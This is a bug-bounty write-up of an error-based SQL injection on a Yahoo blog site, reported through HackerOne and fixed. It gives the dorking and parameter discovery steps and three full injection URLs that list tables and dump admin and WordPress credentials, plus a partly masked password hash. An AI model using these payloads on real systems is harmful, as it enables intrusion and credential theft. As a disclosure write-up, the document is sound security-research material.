Yahoo SQL Injection

Posted on

Blink. Blink. Blink.

Hello Floks!

Today, I’m going to blog about a vulnerability I found in one of Yahoo’s websites, “Ystoreblog“. The vulnerability was fixed long ago, but I though about sharing this story with you!

It’s a rainy December day. As everyday, I’m in front of my computer searching for bugs , for bugs and for bugs. I vistited HackerOne’s directory and I came across Yahoo’s bug bounty program on HackerOne . After checking up the program rules , I did some Google research about Yahoo owned blogs and I came across this website : Ystoreblog .

First Step : Finding the Vulnerability

So as for many researchers the first step was to check for files using Google dorks . I went to Google search and dorked : “site:ystoreblog.com ext:php” . Fortunately, I found some PHP file such as http://www.ystoreblog.com/ystore-poll/script3.php . I did some parameter bruteforce and found out that “opt” is a valid parameter. Next thing I was excited about is checking for SQL Injection. I added the quote in the parameter value and viewed on the page the SQL error message : “You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘\’=flash_poll.count1\’+1 WHERE ID=39’ at line 1” . You all know . My reaction was like this :

m1

 

Next step : Exploitation

Exploitation was not really easy. Shame on me for not having all the screen-shots to show you the images.

Well, here are the queries:

First to get tables’name :
http://www.ystoreblog.com/ystore-poll/script3.php?idf=39&opt==null and(select 1 FROM(select count(),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(table_name as char),0x27,0x7e) FROM information_schema.tables WHERE table_schema=0x7961686f6f73746f7265626c6f6774657374 LIMIT 1,1)) FROM information_schema.tables LIMIT 0,1),floor(rand(0)2))x FROM information_schema.tables GROUP BY x)a)– –

Then to dump the admin table content :

http://www.ystoreblog.com/ystore-poll/script3.php?idf=39&opt==null and+(select 1 FROM(select+count(),concat((select+concat(0x3a,user,0x3a,passwd,0x3a,user_level,0x3a) FROM tbl_ystoreblog_admin+LIMIT+0,1),floor(rand(0)2))x FROM information_schema.tables+GROUP BY x)b)– –

And finally, to dump the wp_admin table content :
http://www.ystoreblog.com/ystore-poll/script3.php?idf=39&opt==null and+(select 1 FROM(select+count(*),concat((select+concat(user_login,0x3a,user_pass,0x3a3a) FROM wp_users+LIMIT+0,1),floor(rand(0)*2))x FROM information_schema.tables+GROUP BY x)b)– –

What we got now:  user_login : ystoreblog & user_pass : $P$9gqP7teXN2L6uyzg7pKVkV.******

And now you know my face after hacking the logins.

happy-child

Well, it was really tricky. I gathered all these and submitted the vulnerability to Yahoo.

Thank you for reading and see you soon!

Vulnerability timeline:

  • 2014-12-02 : Bug submitted to Yahoo
  • 2014-12-02 : More infos requested
  • 2014-12-02 : More infos sent
  • 2014-12-03 : Bug fixed
  • 2014-01-10 : Bounty awarded

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

One thought on “Yahoo SQL Injection

Leave a comment